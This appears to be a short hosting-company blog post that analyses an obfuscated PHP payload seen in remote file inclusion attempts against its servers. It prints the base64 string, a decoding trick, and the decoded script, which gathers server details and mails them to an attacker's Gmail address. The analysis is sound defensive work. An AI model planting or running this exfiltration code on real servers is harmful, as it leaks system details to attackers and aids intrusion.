Support

Blog

Flattr this!

Foreword – Note that none of our servers are vulnerable to remote inclusion attacks.

For the most part, most of the exploits I covered in yesterdays post are common garden php vulnerability scans.
Some of them are more interesting though, although more for being encrypted, than anything else.

If I take an example from our log files:

http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt

This returns an encrypted string.
Its fairly easy to see whats been returned in that, merely by changing the eval to an echo.

//Edited slightly for width purposes
$lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXb".
"HNMbU52YlE9PSIpOw0KKCRzYWZlX21vZGUpPygkc2FmZXo9".
"Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRw".
"Oi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFU".
"VVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGl".
"wID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0".
"aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3V".
"iaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIl".
"xuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6".
"ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7D".
"QokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRv".
"b2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCgg".
"JGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZn JvbSk7"; 

//eval(base64_decode($lmge));

//To stop execution, and merely see the script contents we echo it, instead of eval..
echo (base64_decode($lmge));
exit;

This returns this:

$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ=="); 

($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; 
$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; 
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."";
mail( $creator, $subj, $msg, $from);

So in this case we can see the attacker wants us to email him our server details, what url worked for the exploit, and a few various php details.

If we look at the email account he wants to email to we can see its a google account.

echo base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");   //returns fr33sh3ll@gmail.com

Google has been notified about that account.
All in all, slightly more interesting than the usual!